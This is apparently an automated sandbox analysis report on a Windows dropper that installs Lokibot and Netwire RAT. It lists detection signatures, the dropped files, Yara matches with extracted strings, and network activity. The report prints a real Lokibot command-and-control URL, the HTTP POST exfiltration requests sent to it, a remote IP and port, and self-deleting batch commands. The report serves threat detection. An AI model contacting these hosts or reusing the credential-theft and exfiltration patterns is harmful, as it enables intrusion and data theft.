Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.MulDrop.1161.895.14575

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.MulDrop.1161.895.14575 (renamed file extension from 14575 to exe)
Analysis ID:255718
MD5:32ffae9524a6321051248e4313c91852
SHA1:5e28c29f740842a5eee6f2717d25f86dd3b0f752
SHA256:6a223f3097e572a00aa6f1029bbbb6d71d66bb5bbf239177d232dca3c7f9bf33

Most interesting Screenshot:

Detection

Lokibot Netwire
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Yara detected Netwire RAT
.NET source code contains potential unpacker
Contains functionality to log keystrokes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.MulDrop.1161.895.exe (PID: 6996 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exe' MD5: 32FFAE9524A6321051248E4313C91852)
    • RegAsm.exe (PID: 7036 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
      • build.exe (PID: 7104 cmdline: 'C:\Users\user\AppData\Local\Temp\build.exe' MD5: 11630FB6894211BACABD49F2B7BE8513)
      • StartUpHost.exe (PID: 7124 cmdline: 'C:\Users\user\AppData\Local\Temp\StartUpHost.exe' MD5: E939EF01439E8B274C590FAF397471F2)
        • Host.exe (PID: 7148 cmdline: C:\Users\user\AppData\Roaming\Install\Host.exe MD5: E939EF01439E8B274C590FAF397471F2)
  • Host.exe (PID: 5832 cmdline: 'C:\Users\user\AppData\Roaming\Install\Host.exe' MD5: E939EF01439E8B274C590FAF397471F2)
  • Host.exe (PID: 6772 cmdline: 'C:\Users\user\AppData\Roaming\Install\Host.exe' MD5: E939EF01439E8B274C590FAF397471F2)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"c2:": "http://dresson1.com/wip-admin/js/Panel/five/fre.php"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Install\Host.exeSuspicious_BAT_StringsDetects a string also used in Netwire RAT auxilliaryFlorian Roth
  • 0x1cb4b:$s1: ping 192.0.2.2 -n 1
C:\Users\user\AppData\Roaming\Install\Host.exeMalicious_BAT_StringsDetects a string also used in Netwire RAT auxilliaryFlorian Roth
  • 0x1cb87:$s1: call :deleteSelf&exit /b
C:\Users\user\AppData\Roaming\Install\Host.exeMAL_unspecified_Jan18_1Detects unspecified malware sampleFlorian Roth
  • 0x1d65c:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  • 0x1cb4b:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
  • 0x1d764:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
  • 0x1cbae:$s4: start /b "" cmd /c del "%%~f0"&exit /b
  • 0x1d798:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
  • 0x1d54f:$s6: %s\%s.bat
  • 0x1cb70:$s7: DEL /s "%s" >nul 2>&1
C:\Users\user\AppData\Roaming\Install\Host.exeJoeSecurity_NetwireYara detected Netwire RATJoe Security
    C:\Users\user\AppData\Roaming\Install\Host.exenetwiredetect netwire in memoryJPCERT/CC Incident Response Group
    • 0x1cb4b:$ping: ping 192.0.2.2
    • 0x1d764:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
    Click to see the 10 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmpSuspicious_BAT_StringsDetects a string also used in Netwire RAT auxilliaryFlorian Roth
    • 0x34b:$s1: ping 192.0.2.2 -n 1
    00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmpMalicious_BAT_StringsDetects a string also used in Netwire RAT auxilliaryFlorian Roth
    • 0x387:$s1: call :deleteSelf&exit /b
    00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmpMAL_unspecified_Jan18_1Detects unspecified malware sampleFlorian Roth
    • 0xe5c:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0x34b:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
    • 0xf64:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
    • 0x3ae:$s4: start /b "" cmd /c del "%%~f0"&exit /b
    • 0xf98:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
    • 0xd4f:$s6: %s\%s.bat
    • 0x370:$s7: DEL /s "%s" >nul 2>&1
    00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmpJoeSecurity_NetwireYara detected Netwire RATJoe Security
      00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmpnetwiredetect netwire in memoryJPCERT/CC Incident Response Group
      • 0x34b:$ping: ping 192.0.2.2
      • 0xf64:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
      Click to see the 71 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.2.Host.exe.400000.0.unpackSuspicious_BAT_StringsDetects a string also used in Netwire RAT auxilliaryFlorian Roth
      • 0x1cb4b:$s1: ping 192.0.2.2 -n 1
      11.2.Host.exe.400000.0.unpackMalicious_BAT_StringsDetects a string also used in Netwire RAT auxilliaryFlorian Roth
      • 0x1cb87:$s1: call :deleteSelf&exit /b
      11.2.Host.exe.400000.0.unpackMAL_unspecified_Jan18_1Detects unspecified malware sampleFlorian Roth
      • 0x1d65c:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      • 0x1cb4b:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
      • 0x1d764:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
      • 0x1cbae:$s4: start /b "" cmd /c del "%%~f0"&exit /b
      • 0x1d798:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
      • 0x1d54f:$s6: %s\%s.bat
      • 0x1cb70:$s7: DEL /s "%s" >nul 2>&1
      11.2.Host.exe.400000.0.unpackJoeSecurity_NetwireYara detected Netwire RATJoe Security
        11.2.Host.exe.400000.0.unpacknetwiredetect netwire in memoryJPCERT/CC Incident Response Group
        • 0x1cb4b:$ping: ping 192.0.2.2
        • 0x1d764:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
        Click to see the 44 entries

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: build.exe.7104.2.memstrMalware Configuration Extractor: Lokibot {"c2:": "http://dresson1.com/wip-admin/js/Panel/five/fre.php"}
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\build.exeJoe Sandbox ML: detected
        Machine Learning detection for sampleShow sources
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00415034 CryptUnprotectData,LocalFree,3_2_00415034
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00413125 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_00413125
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00411F98 RegOpenKeyExA,RegOpenKeyExA,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,RegOpenKeyExA,RegOpenKeyExA,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,3_2_00411F98
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_00415034 CryptUnprotectData,LocalFree,6_2_00415034
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_00413125 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,6_2_00413125
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_00411F98 RegOpenKeyExA,RegOpenKeyExA,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,RegOpenKeyExA,RegOpenKeyExA,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,6_2_00411F98
        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_0040A146 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,3_2_0040A146
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_0041BD01 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,3_2_0041BD01
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00414109 SetErrorMode,FindFirstFileA,strlen,FindNextFileA,FindClose,3_2_00414109
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_004095ED SetErrorMode,FindFirstFileA,FileTimeToSystemTime,FindNextFileA,FindClose,3_2_004095ED
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00409ABC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,3_2_00409ABC
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_0040A146 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,6_2_0040A146
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_0041BD01 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,6_2_0041BD01
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_00414109 SetErrorMode,FindFirstFileA,strlen,FindNextFileA,FindClose,6_2_00414109
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_004095ED SetErrorMode,FindFirstFileA,FileTimeToSystemTime,FindNextFileA,FindClose,6_2_004095ED
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_00409ABC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,6_2_00409ABC
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00409508 GetLogicalDriveStringsA,GetDriveTypeA,3_2_00409508
        Source: global trafficTCP traffic: 192.168.2.4:49715 -> 91.192.100.3:1199
        Source: global trafficHTTP traffic detected: POST /wip-admin/js/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dresson1.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 259B9FA6Content-Length: 190Connection: close
        Source: global trafficHTTP traffic detected: POST /wip-admin/js/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dresson1.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 259B9FA6Content-Length: 190Connection: close
        Source: global trafficHTTP traffic detected: POST /wip-admin/js/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dresson1.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 259B9FA6Content-Length: 163Connection: close
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: unknownTCP traffic detected without corresponding DNS query: 91.192.100.3
        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
        Source: unknownDNS traffic detected: queries for: dresson1.com
        Source: unknownHTTP traffic detected: POST /wip-admin/js/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dresson1.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 259B9FA6Content-Length: 190Connection: close
        Source: build.exe, 00000002.00000002.239470014.000000000049F000.00000004.00020000.sdmpString found in binary or memory: http://dresson1.com/wip-admin/js/Panel/five/fre.php
        Source: build.exe, 00000002.00000002.239459451.0000000000415000.00000002.00020000.sdmp, build.exe.1.drString found in binary or memory: http://www.ibsensoftware.com/

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        barindex
        Contains functionality to log keystrokesShow sources
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState,3_2_0040DB3B
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState,6_2_0040DB3B
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00418E44 GetSystemMetrics,GetSystemMetrics,GetDesktopWindow,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetDIBits,calloc,GetDIBits,ReleaseDC,DeleteDC,DeleteObject,3_2_00418E44
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState,3_2_0040DB3B
        Source: Host.exe, 00000004.00000002.492393315.00000000009BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
        Source: Host.exe, 00000004.00000002.492150861.0000000000424000.00000004.00020000.sdmpBinary or memory string: GetRawInputData
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState,3_2_0040DB3B
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState,6_2_0040DB3B

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORYMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPEDMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPEDMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPEDMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPEDMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPEDMatched rule: Loki Payload Author: kevoreilly
        Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPEDMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
        Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 2.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
        Source: 2.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects unspecified malware sample Author: Florian Roth
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exeFile created: C:\Windows\assembly\Desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exeCode function: 0_2_056F0EAC0_2_056F0EAC
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_0040119D1_2_0040119D
        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_0040549C2_2_0040549C
        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_004029D42_2_004029D4
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_004100663_2_00410066
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_0040F0343_2_0040F034
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00403C383_2_00403C38
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_004045D93_2_004045D9
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_004035B03_2_004035B0
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00403F2F3_2_00403F2F
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_004100666_2_00410066
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_0040F0346_2_0040F034
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_00403C386_2_00403C38
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_004045D96_2_004045D9
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_004035B06_2_004035B0
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeCode function: 6_2_00403F2F6_2_00403F2F
        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: String function: 0041219C appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: String function: 00405B6F appears 41 times
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe, 00000000.00000002.226356143.0000000000F5A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHD-ApkHandler.exe8 vs SecuriteInfo.com.Trojan.MulDrop.1161.895.exe
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe, 00000000.00000002.229075360.00000000057B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs SecuriteInfo.com.Trojan.MulDrop.1161.895.exe
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exeBinary or memory string: OriginalFilenameHD-ApkHandler.exe8 vs SecuriteInfo.com.Trojan.MulDrop.1161.895.exe
